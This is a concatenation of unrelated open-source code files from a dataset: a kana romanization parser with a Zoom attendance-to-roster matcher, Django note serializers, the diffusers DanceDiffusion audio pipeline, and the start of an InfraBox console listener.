        Mora('ne', 'ネ', '\uff88', 'ね', 'ne'),
        Mora('no', 'ノ', '\uff89', 'の', 'no'),
        Mora('ha', 'ハ', '\uff8a', 'は', 'ha'),
        Mora('hi', 'ヒ', '\uff8b', 'ひ', 'hi', '+hy'),
        Mora('hu', 'フ', '\uff8c', 'ふ', '!hu', 'fu', '+hu', '+f'),
        Mora('he', 'ヘ', '\uff8d', 'へ', 'he'),
        Mora('ho', 'ホ', '\uff8e', 'ほ', 'ho'),
        Mora('ma', 'マ', '\uff8f', 'ま', 'ma'),
        Mora('mi', 'ミ', '\uff90', 'み', 'mi', '+my'),
        Mora('mu', 'ム', '\uff91', 'む', 'mu', '+m'),
        Mora('me', 'メ', '\uff92', 'め', 'me'),
        Mora('mo', 'モ', '\uff93', 'も', 'mo'),
        Mora('ya', 'ヤ', '\uff94', 'や', 'ya'),
        Mora('yu', 'ユ', '\uff95', 'ゆ', 'yu'),
        Mora('ye', 'イェ', '\uff72\uff6a', 'いぇ', 'ye'),
        Mora('yo', 'ヨ', '\uff96', 'よ', 'yo'),
        Mora('ra', 'ラ', '\uff97', 'ら', 'ra', '+la'),
        Mora('ri', 'リ', '\uff98', 'り', 'ri', '+li', '+ry', '+ly'),
        Mora('ru', 'ル', '\uff99', 'る', 'ru', '+lu', '+r', '+l'),
        Mora('re', 'レ', '\uff9a', 'れ', 're', '+le'),
        Mora('ro', 'ロ', '\uff9b', 'ろ', 'ro', '+lo'),
        Mora('wa', 'ワ', '\uff9c', 'わ', 'wa'),
        Mora('wi', 'ウィ', '\uff73\uff68', 'うぃ', 'whi', '+wi', '+wy', '+why'),
        Mora('we', 'ウェ', '\uff73\uff6a', 'うぇ', 'whe', '+we'),
        Mora('wo', 'ウォ', '\uff73\uff6b', 'うぉ', 'who'),
        Mora('Wi', 'ヰ', None, 'ゐ', '!wi'),
        Mora('We', 'ヱ', None, 'ゑ', '!we'),
        Mora('Wo', 'ヲ', '\uff66', 'を', 'wo'),
        # Special moras: They don't have actual pronunciation,
        # but we keep them for IMEs.
        Mora('xW', 'ァ', '\uff67', 'ぁ', '!xa', '!la'),
        Mora('xI', 'ィ', '\uff68', 'ぃ', '!xi', '!li'),
        Mora('xV', 'ゥ', '\uff69', 'ぅ', '!xu', '!lu'),
        Mora('xE', 'ェ', '\uff6a', 'ぇ', '!xe', '!le'),
        Mora('xR', 'ォ', '\uff6b', 'ぉ', '!xo', '!lo'),
        Mora('xA', 'ャ', '\uff6c', 'ゃ', '!xya', '!lya'),
        Mora('xU', 'ュ', '\uff6d', 'ゅ', '!xyu', '!lyu'),
        Mora('xO', 'ョ', '\uff6e', 'ょ', '!xyo', '!lyo'),
        # chouon
        Mora('x-', 'ー', '\uff70', 'ー', '!x-', '+h'),
        # choked sound (Sokuon)
        Mora('.t', 'ッ', '\uff6f', 'っ', '!xtu', '!ltu',
             'k:k', 's:s', 't:t', 'h:h', 'f:f', 'm:m', 'r:r',
             'g:g', 'z:z', 'j:j', 'd:d', 'b:b', 'v:v', 'b:c', 't:c'),
        # voiced (Dakuon)
        Mora('ga', 'ガ', '\uff76\uff9e', 'が', 'ga'),
        Mora('gi', 'ギ', '\uff77\uff9e', 'ぎ', 'gi', '+gy'),
        Mora('gu', 'グ', '\uff78\uff9e', 'ぐ', 'gu', '+g'),
        Mora('ge', 'ゲ', '\uff79\uff9e', 'げ', 'ge'),
        Mora('go', 'ゴ', '\uff7a\uff9e', 'ご', 'go'),
        Mora('za', 'ザ', '\uff7b\uff9e', 'ざ', 'za'),
        Mora('zi', 'ジ', '\uff7c\uff9e', 'じ', '!zi', 'ji', '+zi'),
        Mora('zu', 'ズ', '\uff7d\uff9e', 'ず', 'zu', '+z'),
        Mora('ze', 'ゼ', '\uff7e\uff9e', 'ぜ', 'ze'),
        Mora('zo', 'ゾ', '\uff7f\uff9e', 'ぞ', 'zo'),
        Mora('da', 'ダ', '\uff80\uff9e', 'だ', 'da'),
        Mora('di', 'ヂ', '\uff81\uff9e', 'ぢ', '!di', 'dzi'),
        Mora('du', 'ヅ', '\uff82\uff9e', 'づ', '!du', 'dzu'),
        Mora('de', 'デ', '\uff83\uff9e', 'で', 'de'),
        Mora('do', 'ド', '\uff84\uff9e', 'ど', 'do', '+d'),
        Mora('ba', 'バ', '\uff8a\uff9e', 'ば', 'ba'),
        Mora('bi', 'ビ', '\uff8b\uff9e', 'び', 'bi', '+by'),
        Mora('bu', 'ブ', '\uff8c\uff9e', 'ぶ', 'bu', '+b'),
        Mora('be', 'ベ', '\uff8d\uff9e', 'べ', 'be'),
        Mora('bo', 'ボ', '\uff8e\uff9e', 'ぼ', 'bo'),
        # p- sound (Handakuon)
        Mora('pa', 'パ', '\uff8a\uff9f', 'ぱ', 'pa'),
        Mora('pi', 'ピ', '\uff8b\uff9f', 'ぴ', 'pi', '+py'),
        Mora('pu', 'プ', '\uff8c\uff9f', 'ぷ', 'pu', '+p'),
        Mora('pe', 'ペ', '\uff8d\uff9f', 'ぺ', 'pe'),
        Mora('po', 'ポ', '\uff8e\uff9f', 'ぽ', 'po'),
        # double consonants (Youon)
        Mora('KA', 'キャ', '\uff77\uff6c', 'きゃ', 'kya'),
        Mora('KU', 'キュ', '\uff77\uff6d', 'きゅ', 'kyu', '+cu'),
        Mora('KE', 'キェ', '\uff77\uff6a', 'きぇ', 'kye'),
        Mora('KO', 'キョ', '\uff77\uff6e', 'きょ', 'kyo'),
        Mora('kA', 'クァ', '\uff78\uff67', 'くぁ', 'qa'),
        Mora('kI', 'クィ', '\uff78\uff68', 'くぃ', 'qi'),
        Mora('kE', 'クェ', '\uff78\uff6a', 'くぇ', 'qe'),
        Mora('kO', 'クォ', '\uff78\uff6b', 'くぉ', 'qo'),
        Mora('SA', 'シャ', '\uff7c\uff6c', 'しゃ', '!sya', 'sha', '+sya'),
        Mora('SU', 'シュ', '\uff7c\uff6d', 'しゅ', '!syu', 'shu', '+syu', '+sh'),
        Mora('SE', 'シェ', '\uff7c\uff6a', 'しぇ', '!sye', 'she', '+sye'),
        Mora('SO', 'ショ', '\uff7c\uff6e', 'しょ', '!syo', 'sho', '+syo'),
        Mora('CA', 'チャ', '\uff81\uff6c', 'ちゃ', '!tya', '!cya', 'cha'),
        Mora('CU', 'チュ', '\uff81\uff6d', 'ちゅ', '!tyu', '!cyu', 'chu'),
        Mora('CE', 'チェ', '\uff81\uff6a', 'ちぇ', '!tye', '!cye', 'che'),
        Mora('CO', 'チョ', '\uff81\uff6e', 'ちょ', '!tyo', '!cyo', 'cho'),
        Mora('TI', 'ティ', '\uff83\uff68', 'てぃ', '!tyi', '+ti'),
        Mora('TU', 'テュ', '\uff83\uff6d', 'てゅ', '!thu', '+tu'),
        Mora('TO', 'トゥ', '\uff84\uff69', 'とぅ', '!tho', '+two'),
        Mora('NA', 'ニャ', '\uff86\uff6c', 'にゃ', 'nya'),
        Mora('NU', 'ニュ', '\uff86\uff6d', 'にゅ', 'nyu'),
        Mora('NI', 'ニェ', '\uff86\uff6a', 'にぇ', 'nye'),
        Mora('NO', 'ニョ', '\uff86\uff6e', 'にょ', 'nyo'),
        Mora('HA', 'ヒャ', '\uff8b\uff6c', 'ひゃ', 'hya'),
        Mora('HU', 'ヒュ', '\uff8b\uff6d', 'ひゅ', 'hyu'),
        Mora('HE', 'ヒェ', '\uff8b\uff6a', 'ひぇ', 'hye'),
        Mora('HO', 'ヒョ', '\uff8b\uff6e', 'ひょ', 'hyo'),
        Mora('FA', 'ファ', '\uff8c\uff67', 'ふぁ', 'fa'),
        Mora('FI', 'フィ', '\uff8c\uff68', 'ふぃ', 'fi', '+fy'),
        Mora('FE', 'フェ', '\uff8c\uff6a', 'ふぇ', 'fe'),
        Mora('FO', 'フォ', '\uff8c\uff6b', 'ふぉ', 'fo'),
        Mora('FU', 'フュ', '\uff8c\uff6d', 'ふゅ', 'fyu'),
        Mora('Fo', 'フョ', '\uff8c\uff6e', 'ふょ', 'fyo'),
        Mora('MA', 'ミャ', '\uff90\uff6c', 'みゃ', 'mya'),
        Mora('MU', 'ミュ', '\uff90\uff6d', 'みゅ', 'myu'),
        Mora('ME', 'ミェ', '\uff90\uff6a', 'みぇ', 'mye'),
        Mora('MO', 'ミョ', '\uff90\uff6e', 'みょ', 'myo'),
        Mora('RA', 'リャ', '\uff98\uff6c', 'りゃ', 'rya', '+lya'),
        Mora('RU', 'リュ', '\uff98\uff6d', 'りゅ', 'ryu', '+lyu'),
        Mora('RE', 'リェ', '\uff98\uff6a', 'りぇ', 'rye', '+lye'),
        Mora('RO', 'リョ', '\uff98\uff6e', 'りょ', 'ryo', '+lyo'),
        # double consonants + voiced
        Mora('GA', 'ギャ', '\uff77\uff9e\uff6c', 'ぎゃ', 'gya'),
        Mora('GU', 'ギュ', '\uff77\uff9e\uff6d', 'ぎゅ', 'gyu'),
        Mora('GE', 'ギェ', '\uff77\uff9e\uff6a', 'ぎぇ', 'gye'),
        Mora('GO', 'ギョ', '\uff77\uff9e\uff6e', 'ぎょ', 'gyo'),
        Mora('Ja', 'ジャ', '\uff7c\uff9e\uff6c', 'じゃ', 'ja', 'zya'),
        Mora('Ju', 'ジュ', '\uff7c\uff9e\uff6d', 'じゅ', 'ju', 'zyu'),
        Mora('Je', 'ジェ', '\uff7c\uff9e\uff6a', 'じぇ', 'je', 'zye'),
        Mora('Jo', 'ジョ', '\uff7c\uff9e\uff6e', 'じょ', 'jo', 'zyo'),
        Mora('JA', 'ヂャ', '\uff81\uff9e\uff6c', 'ぢゃ', 'zha'),
        Mora('JU', 'ヂュ', '\uff81\uff9e\uff6d', 'ぢゅ', 'zhu'),
        Mora('JE', 'ヂェ', '\uff81\uff9e\uff6a', 'ぢぇ', 'zhe'),
        Mora('JO', 'ヂョ', '\uff81\uff9e\uff6e', 'ぢょ', 'zho'),
        Mora('dI', 'ディ', '\uff83\uff9e\uff68', 'でぃ', '+di', 'dyi'),
        Mora('dU', 'デュ', '\uff83\uff9e\uff6d', 'でゅ', '+du', 'dyu', 'dhu'),
        Mora('dO', 'ドゥ', '\uff84\uff9e\uff69', 'どぅ', 'dho'),
        Mora('BA', 'ビャ', '\uff8b\uff9e\uff6c', 'びゃ', 'bya'),
        Mora('BU', 'ビュ', '\uff8b\uff9e\uff6d', 'びゅ', 'byu'),
        Mora('BE', 'ビェ', '\uff8b\uff9e\uff6a', 'びぇ', 'bye'),
        Mora('BO', 'ビョ', '\uff8b\uff9e\uff6e', 'びょ', 'byo'),
        Mora('va', 'ヴァ', '\uff73\uff9e\uff67', 'う゛ぁ', 'va'),
        Mora('vi', 'ヴィ', '\uff73\uff9e\uff68', 'う゛ぃ', 'vi', '+vy'),
        Mora('vu', 'ヴ', '\uff73\uff9e', 'う゛', 'vu', '+v'),
        Mora('ve', 'ヴェ', '\uff73\uff9e\uff6a', 'う゛ぇ', 've'),
        Mora('vo', 'ヴォ', '\uff73\uff9e\uff6b', 'う゛ぉ', 'vo'),
        # double consonants + p-sound
        Mora('PA', 'ピャ', '\uff8b\uff9f\uff6c', 'ぴゃ', 'pya'),
        Mora('PU', 'ピュ', '\uff8b\uff9f\uff6d', 'ぴゅ', 'pyu'),
        Mora('PE', 'ピェ', '\uff8b\uff9f\uff6a', 'ぴぇ', 'pye'),
        Mora('PO', 'ピョ', '\uff8b\uff9f\uff6e', 'ぴょ', 'pyo'),
    )
    # Index from mora id to its Mora object, used by get().
    KEY2MORA = { m.mid:m for m in ALL }
## Mora Parser
##
class MoraParser:
    """Trie-based tokenizer that maps text to Mora objects.

    The base class indexes every kana spelling (full-width katakana,
    half-width katakana, hiragana); subclasses additionally register
    romanization spellings via add().
    """
    def __init__(self):
        # Trie node layout: {char: (mora_or_None, consumed_prefix, subtree)}.
        # mora is None for intermediate nodes that complete no spelling.
        self._tree = {}
        for m in MoraTable.ALL:
            for k in (m.zenk, m.hank, m.zenh):
                if k is None: continue
                self.add(k, m, allowConflict=True)
        return
    def add(self, s, m, allowConflict=False):
        """Register spelling s for mora m.

        s may contain one ':' splitting it into a consumed part (s0) and a
        lookahead part (s1), e.g. 'n:k' matches "nk" but advances the parse
        position only past "n"; the "k" is re-scanned for the next mora.
        Raises ValueError if s is already registered, unless allowConflict.
        """
        #print('add:', s, m)
        t0 = self._tree
        (s0,_,s1) = s.partition(':')
        # Walk/build intermediate nodes for all but the last character.
        for c in (s0+s1)[:-1]:
            if c in t0:
                (_,_,t1) = t0[c]
            else:
                t1 = {}
                t0[c] = (None, None, t1)
            t0 = t1
        c = (s0+s1)[-1]
        if c in t0:
            (obj,_,t1) = t0[c]
            if obj is not None and not allowConflict:
                raise ValueError('already defined: %r' % s)
        else:
            t1 = {}
        t0[c] = (m, s0, t1)
        return
    def parse(self, s, i0=0):
        """Yield (matched_text, Mora) pairs from s, starting at index i0.

        Matching is case-insensitive.  Characters that start no spelling are
        yielded as (char, None).  After a ':'-rule match only the consumed
        prefix (s0) advances the position, so lookahead text is re-scanned.
        """
        i1 = i0
        t0 = self._tree
        # m/s0 hold the (mora, consumed-prefix) of the last trie node we
        # descended into; m is None while only a partial match is pending.
        m = s0 = None
        while i1 < len(s):
            c = s[i1].lower()
            if c in t0:
                (m,s0,t1) = t0[c]
                i1 += 1
                t0 = t1
            elif m is not None:
                # The trie walk failed but a completed match is pending:
                # emit it and restart right after its consumed prefix.
                yield (s[i0:i1], m)
                i0 = i1 = i0+len(s0)
                t0 = self._tree
                m = s0 = None
            else:
                # No match at all: pass the raw character through.
                yield (s[i1], None)
                i0 = i1 = i1+1
                t0 = self._tree
        if m is not None:
            yield (s[i0:], m)
        return
class MoraParserOfficial(MoraParser):
    """Parser accepting official-style romanization; ン must be spelled "nn"
    (or "n'" / "n"+consonant via the table's context rules)."""

    def __init__(self):
        super().__init__()
        for mora in MoraTable.ALL:
            for spelling in mora.roff:
                self.add(spelling, mora)
        self.add('nn', MoraTable.MORA_NN)
class MoraParserOfficialAnna(MoraParser):
    """Official-style parser where a single "n" also spells ン
    (the "anna"-style input convention)."""

    def __init__(self):
        super().__init__()
        for mora in MoraTable.ALL:
            for spelling in mora.roff:
                self.add(spelling, mora)
        self.add('n', MoraTable.MORA_NN)
class MoraParserEnglish(MoraParser):
    """Parser accepting English-style (Hepburn-like) romanization."""

    def __init__(self):
        super().__init__()
        for mora in MoraTable.ALL:
            for spelling in mora.reng:
                self.add(spelling, mora)
## String Generator
##
class StringGenerator:
    """Render a sequence of Mora objects and literal strings to text.

    generate() walks the sequence with one item of lookahead so convert()
    can inspect the following item when rendering a mora (needed for
    context-sensitive moras like sokuon ッ and ン).
    """

    def generate(self, seq):
        parts = []
        prev = None
        for item in seq:
            if prev is not None:
                parts.append(self.convert(prev, item)
                             if isinstance(prev, Mora) else prev)
            prev = item
        # Flush the final pending item (no lookahead available).
        if prev is not None:
            parts.append(self.convert(prev, None)
                         if isinstance(prev, Mora) else prev)
        return ''.join(parts)

    def convert(self, m1, m2=None):
        # Default rendering: full-width katakana.
        return m1.zenk
class GeneratorOfficial(StringGenerator):
    """Render moras as official-style romanization; ン is "n'" before
    vowels/y/n and plain "n" otherwise."""

    def convert(self, m1, m2=None):
        if m1.mid == '.t':
            # Sokuon: double the next mora's leading consonant; fall back
            # to 't' when nothing follows.
            return m2.roff[0][0] if isinstance(m2, Mora) else 't'
        if m1.mid == '.n' and (not isinstance(m2, Mora) or m2.mid[0] not in '.ynN'):
            return 'n'  # NN+C -> "n"+C
        return m1.roff[0]
class GeneratorOfficialAnna(StringGenerator):
    """Like GeneratorOfficial but keeps "n'" for ン only before y-moras
    and other special moras."""

    def convert(self, m1, m2=None):
        if m1.mid == '.t':
            # Sokuon: double the next mora's leading consonant; fall back
            # to 't' when nothing follows.
            return m2.roff[0][0] if isinstance(m2, Mora) else 't'
        if m1.mid == '.n' and (not isinstance(m2, Mora) or m2.mid[0] not in '.y'):
            return 'n'  # NN+C -> "n"+C
        return m1.roff[0]
class GeneratorEnglish(StringGenerator):
    """Render moras as English-style romanization ("shi", "tchi", "mp")."""

    def convert(self, m1, m2=None):
        if m1.mid == '.t':
            # Sokuon: double the following consonant, except before a
            # 'c*'-spelled mora (e.g. "tch"), where plain 't' is used.
            if isinstance(m2, Mora) and not m2.reng[0].startswith('c'):
                return m2.reng[0][0]
            return 't'
        if m1.mid == '.n':
            if isinstance(m2, Mora) and m2.mid[0] in 'pP':
                return 'm'  # NN+"p" -> "mp"
            if not isinstance(m2, Mora) or m2.mid[0] not in '.y':
                return 'n'  # NN+C -> "n"+C
        return m1.reng[0]
PARSE_ENGLISH = MoraParserEnglish()
GEN = StringGenerator()
GEN_ENGLISH = GeneratorEnglish()
# expand(s): Expand features
def expand(s):
    """Yield matching-key features for a person name string.

    The name is split into alphabetic runs.  For each run the generator
    collects (1) the lowercased run, (2) its katakana reading and (3) its
    canonical lowercased romanization, both obtained via PARSE_ENGLISH.
    It then yields every collected word, every ordered concatenation of two
    distinct words, and an apostrophe-stripped variant of each -- so that
    e.g. family/given-name order does not matter when IndexDB intersects
    the feature sets.
    """
    # Split s into maximal runs of alphabetic characters.
    words = []
    w = ''
    for c in s:
        if c.isalpha():
            w += c
        elif w:
            words.append(w)
            w = ''
    if w:
        words.append(w)
    # For each word, collect its lowercase, katakana and romanized forms.
    a = []
    for w in words:
        a.append(w.lower())
        w1 = w2 = ''
        for (s,m) in PARSE_ENGLISH.parse(w):
            if m is not None:
                w1 += m.zenk            # katakana reading
                w2 += m.reng[0].lower() # canonical romanization
        if w1:
            a.append(w1)
        if w2:
            a.append(w2)
    # Yield single words and all ordered pairwise concatenations, plus
    # apostrophe-free variants (e.g. "shin'yama" -> "shinyama").
    for w1 in a:
        yield w1
        if "'" in w1:
            yield w1.replace("'",'')
        for w2 in a:
            if w1 != w2:
                w = w1+w2
                yield w
                if "'" in w:
                    yield w.replace("'",'')
    return
class IndexDB:
    """In-memory inverted index from name features to sets of user ids."""

    def __init__(self):
        # feature string -> set of uids
        self.index = {}

    def add(self, name, uid):
        # Index every feature variant derived from the name via expand().
        for feat in set(expand(name)):
            self.addraw(feat, uid)

    def addraw(self, feat, uid):
        # Register a single literal feature for uid.
        self.index.setdefault(feat, set()).add(uid)

    def lookup(self, name):
        """Return the set of uids matching every known feature of name,
        or None when none of the name's features is indexed at all."""
        uids = None
        for feat in set(expand(name)):
            matched = self.index.get(feat)
            if matched is None:
                continue
            uids = matched if uids is None else uids.intersection(matched)
        return uids
def main(argv):
    """Command-line entry point.

    Options:
      -i input : roster file.  '*.csv' is read as a CP932-encoded campus
                 roster whose columns 2/3/4 are student id, kanji name and
                 kana name (see meibo.csv in the file header); anything else
                 as whitespace-separated "uid name name ..." lines where
                 '#' starts a comment.
      -p range : only report attendees whose session overlaps HH:MM[-HH:MM].
      file ... : Zoom attendance report CSVs (name, _, join, leave, ...).

    Prints "uid # name" per matched attendee, or a '#'-prefixed diagnostic
    line when a name is unknown or matches three or more candidates.
    Returns a process exit status (0 on success, 100 on usage error).
    """
    import getopt
    def usage():
        print('usage: %s [-i input] [-p HH:MM[-HH:MM]] [file ...]' % argv[0])
        return 100
    try:
        (opts, args) = getopt.getopt(argv[1:], 'i:p:')
    except getopt.GetoptError:
        return usage()
    db = IndexDB()
    # r0/r1: optional time window the attendance must overlap.
    r0 = r1 = None
    for (k, v) in opts:
        if k == '-i':
            path = v
            if path.endswith('.csv'):
                # Campus roster CSV; first row is a header and skipped.
                with open(path, encoding='cp932') as fp:
                    table = list(csv.reader(fp))
                for row in table[1:]:
                    uid = row[2]
                    # The uid itself is indexed literally, the names via
                    # feature expansion.
                    db.addraw(row[2], uid)
                    db.add(row[3], uid)
                    db.add(row[4], uid)
            else:
                # Plain text extras: "uid word word ..." per line.
                with open(path) as fp:
                    for line in fp:
                        (line,_,_) = line.strip().partition('#')
                        if not line: continue
                        f = line.split()
                        uid = f.pop(0)
                        for w in f:
                            db.add(w, uid)
        elif k == '-p':
            # Parse "HH:MM" or "HH:MM-HH:MM" into a [r0, r1] window.
            (t1,_,t2) = v.partition('-')
            (h,_,m) = t1.partition(':')
            r1 = r0 = time(int(h), int(m))
            if t2:
                (h,_,m) = t2.partition(':')
                r1 = time(int(h), int(m))
            assert r0 <= r1
    for path in args:
        # Zoom report CSV; first row is a header and skipped.
        with open(path) as fp:
            table = list(csv.reader(fp))
        for row in table[1:]:
            name = row[0]
            dt0 = datetime.strptime(row[2], '%Y/%m/%d %H:%M:%S')
            dt1 = datetime.strptime(row[3], '%Y/%m/%d %H:%M:%S')
            t0 = dt0.time()
            t1 = dt1.time()
            # Skip sessions that do not overlap the -p window.
            if r0 is not None and (t1 < r0 or r1 < t0): continue
            uids = db.lookup(name)
            if uids is None:
                print(f'# notfound: {name}')
            elif 2 < len(uids):
                print(f'# ambiguous: {name} {uids}')
            else:
                # NOTE(review): an empty intersection (all features known
                # but no common uid) would raise IndexError here, and a
                # 2-uid result silently picks an arbitrary one -- confirm
                # both are intended.
                uid = list(uids)[0]
                print(f'{uid} # {name}')
    return 0
if __name__ == '__main__': sys.exit(main(sys.argv))
| [
"yusuke@shinyama.jp"
] | yusuke@shinyama.jp |
d6e06778da1716fbaaf68b4e91319ac1c219ef43 | daaf133cc4146ecd3b0df5ceafea84daa6bac2ce | /project/notes/serializers.py | 085cf9d4da8d8d79ed810d541f550edae69f4dcb | [] | no_license | core-api/heroku-app | 8c29452c609e4ff2344542e1e952a343f29953f6 | 7f03a36dc34baddcdf4cda8534ab800a98e079c9 | refs/heads/master | 2023-07-20T05:34:25.707890 | 2016-01-20T12:32:12 | 2016-01-20T12:32:12 | 32,865,301 | 1 | 0 | null | 2016-01-20T12:23:01 | 2015-03-25T13:11:06 | Python | UTF-8 | Python | false | false | 326 | py | from rest_framework import serializers
class AddNoteSerializer(serializers.Serializer):
    """Input serializer for creating a note."""
    # Note text; DRF enforces presence and the 100-character cap.
    description = serializers.CharField(max_length=100)
class EditNoteSerializer(serializers.Serializer):
    """Input serializer for updating a note; both fields are optional so
    clients can patch either one independently."""
    # Replacement note text, if provided.
    description = serializers.CharField(max_length=100, required=False)
    # New completion state, if provided.
    complete = serializers.BooleanField(required=False)
| [
"tom@tomchristie.com"
] | tom@tomchristie.com |
4b95149358f6dfefe0687c5d6e8ae4f54758fb4a | b74320ad439e37dfa48cd8db38dab3b7a20a36ff | /src/diffusers/pipelines/dance_diffusion/pipeline_dance_diffusion.py | b2d46c6f90f142635dec50da02b00fe63b3e40c2 | [
"Apache-2.0"
] | permissive | huggingface/diffusers | c82beba1ec5f0aba01b6744040a5accc41ec2493 | 5eeedd9e3336882d598091e191559f67433b6427 | refs/heads/main | 2023-08-29T01:22:52.237910 | 2023-08-28T18:16:27 | 2023-08-28T18:16:27 | 498,011,141 | 17,308 | 3,158 | Apache-2.0 | 2023-09-14T20:57:44 | 2022-05-30T16:04:02 | Python | UTF-8 | Python | false | false | 6,254 | py | # Copyright 2023 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List, Optional, Tuple, Union
import torch
from ...utils import logging, randn_tensor
from ..pipeline_utils import AudioPipelineOutput, DiffusionPipeline
logger = logging.get_logger(__name__) # pylint: disable=invalid-name
class DanceDiffusionPipeline(DiffusionPipeline):
    r"""
    Pipeline for audio generation.
    This model inherits from [`DiffusionPipeline`]. Check the superclass documentation for the generic methods
    implemented for all pipelines (downloading, saving, running on a particular device, etc.).
    Parameters:
        unet ([`UNet1DModel`]):
            A `UNet1DModel` to denoise the encoded audio.
        scheduler ([`SchedulerMixin`]):
            A scheduler to be used in combination with `unet` to denoise the encoded audio latents. Can be one of
            [`IPNDMScheduler`].
    """
    def __init__(self, unet, scheduler):
        super().__init__()
        # register_modules makes unet/scheduler available as attributes and
        # includes them in save/load.
        self.register_modules(unet=unet, scheduler=scheduler)
    @torch.no_grad()
    def __call__(
        self,
        batch_size: int = 1,
        num_inference_steps: int = 100,
        generator: Optional[Union[torch.Generator, List[torch.Generator]]] = None,
        audio_length_in_s: Optional[float] = None,
        return_dict: bool = True,
    ) -> Union[AudioPipelineOutput, Tuple]:
        r"""
        The call function to the pipeline for generation.
        Args:
            batch_size (`int`, *optional*, defaults to 1):
                The number of audio samples to generate.
            num_inference_steps (`int`, *optional*, defaults to 50):
                The number of denoising steps. More denoising steps usually lead to a higher-quality audio sample at
                the expense of slower inference.
            generator (`torch.Generator`, *optional*):
                A [`torch.Generator`](https://pytorch.org/docs/stable/generated/torch.Generator.html) to make
                generation deterministic.
            audio_length_in_s (`float`, *optional*, defaults to `self.unet.config.sample_size/self.unet.config.sample_rate`):
                The length of the generated audio sample in seconds.
            return_dict (`bool`, *optional*, defaults to `True`):
                Whether or not to return a [`~pipelines.AudioPipelineOutput`] instead of a plain tuple.
        Example:
        ```py
        from diffusers import DiffusionPipeline
        from scipy.io.wavfile import write
        model_id = "harmonai/maestro-150k"
        pipe = DiffusionPipeline.from_pretrained(model_id)
        pipe = pipe.to("cuda")
        audios = pipe(audio_length_in_s=4.0).audios
        # To save locally
        for i, audio in enumerate(audios):
            write(f"maestro_test_{i}.wav", pipe.unet.sample_rate, audio.transpose())
        # To dislay in google colab
        import IPython.display as ipd
        for audio in audios:
            display(ipd.Audio(audio, rate=pipe.unet.sample_rate))
        ```
        Returns:
            [`~pipelines.AudioPipelineOutput`] or `tuple`:
                If `return_dict` is `True`, [`~pipelines.AudioPipelineOutput`] is returned, otherwise a `tuple` is
                returned where the first element is a list with the generated audio.
        """
        if audio_length_in_s is None:
            audio_length_in_s = self.unet.config.sample_size / self.unet.config.sample_rate
        # Requested length in raw samples (may be fractional at this point).
        sample_size = audio_length_in_s * self.unet.config.sample_rate
        # Each up-block doubles the sample count, so the input length must be
        # a multiple of 2**len(up_blocks).
        down_scale_factor = 2 ** len(self.unet.up_blocks)
        if sample_size < 3 * down_scale_factor:
            raise ValueError(
                f"{audio_length_in_s} is too small. Make sure it's bigger or equal to"
                f" {3 * down_scale_factor / self.unet.config.sample_rate}."
            )
        original_sample_size = int(sample_size)
        if sample_size % down_scale_factor != 0:
            # Round up to the next multiple; the surplus is trimmed off after
            # denoising so the returned audio has the requested length.
            sample_size = (
                (audio_length_in_s * self.unet.config.sample_rate) // down_scale_factor + 1
            ) * down_scale_factor
            logger.info(
                f"{audio_length_in_s} is increased to {sample_size / self.unet.config.sample_rate} so that it can be handled"
                f" by the model. It will be cut to {original_sample_size / self.unet.config.sample_rate} after the denoising"
                " process."
            )
        sample_size = int(sample_size)
        dtype = next(self.unet.parameters()).dtype
        shape = (batch_size, self.unet.config.in_channels, sample_size)
        if isinstance(generator, list) and len(generator) != batch_size:
            raise ValueError(
                f"You have passed a list of generators of length {len(generator)}, but requested an effective batch"
                f" size of {batch_size}. Make sure the batch size matches the length of the generators."
            )
        # Start from pure noise shaped like the target audio.
        audio = randn_tensor(shape, generator=generator, device=self._execution_device, dtype=dtype)
        # set step values
        self.scheduler.set_timesteps(num_inference_steps, device=audio.device)
        self.scheduler.timesteps = self.scheduler.timesteps.to(dtype)
        for t in self.progress_bar(self.scheduler.timesteps):
            # 1. predict noise model_output
            model_output = self.unet(audio, t).sample
            # 2. compute previous audio sample: x_t -> t_t-1
            audio = self.scheduler.step(model_output, t, audio).prev_sample
        # Clamp to the valid [-1, 1] audio range and trim the padding that was
        # added to satisfy the down-scale factor.
        audio = audio.clamp(-1, 1).float().cpu().numpy()
        audio = audio[:, :, :original_sample_size]
        if not return_dict:
            return (audio,)
        return AudioPipelineOutput(audios=audio)
| [
"noreply@github.com"
] | huggingface.noreply@github.com |
4fe98793df58d5e1bf85fc96af28a813a0e52817 | 906e8d5711f64b45db1541ea15ab5de50c73fafa | /src/api/listeners/console.py | 9ab2fd7769322fa1b97d3a3048b9ab91dc515ed7 | [
"MIT"
] | permissive | yagrxu/infrabox | 079cb2f04f13dc31811698fe94354e32e8ea91e1 | 1d8789db1968897fd471d4dbc1480395d365ff85 | refs/heads/master | 2021-04-15T10:31:54.697521 | 2018-03-21T21:48:12 | 2018-03-21T21:48:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,695 | py | import json
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT
from eventlet.hubs import trampoline
from pyinfraboxutils.db import connect_db
from pyinfraboxutils import dbpool
from pyinfraboxutils import get_logger
logger = get_logger('console_listener')
def __handle_event(event, socketio, client_manager):
    """Push the console output referenced by a 'console_update' notification
    to every websocket client subscribed to the job's room.

    event: decoded NOTIFY payload with 'id' (console row id) and 'job_id'.
    """
    job_id = event['job_id']
    console_id = event['id']
    # Cheap early-out: skip the database round-trip when nobody is
    # watching this job.
    if not client_manager.has_clients(job_id):
        return
    logger.info('start console %s', console_id)
    conn = dbpool.get()
    try:
        r = conn.execute_one('''
            SELECT output FROM console WHERE id = %s
        ''', [console_id])
        logger.info('retrived console %s', console_id)
        if not r:
            return
        r = r[0]
        socketio.emit('notify:console', {
            'data': r,
            'job_id': job_id
        }, room=job_id)
    finally:
        # Always return the connection to the pool, even on early return
        # or error.
        dbpool.put(conn)
    logger.info('stop console %s', console_id)
def listen(socketio, client_manager):
    """Run the console-update listener forever.

    __listen() never returns normally (its inner loop is infinite), so any
    exception -- e.g. a lost database connection -- is logged here and the
    listener is restarted with a fresh connection.
    """
    import time
    while True:
        try:
            __listen(socketio, client_manager)
        except Exception as e:
            logger.exception(e)
            # Back off briefly so a persistent failure (e.g. the database
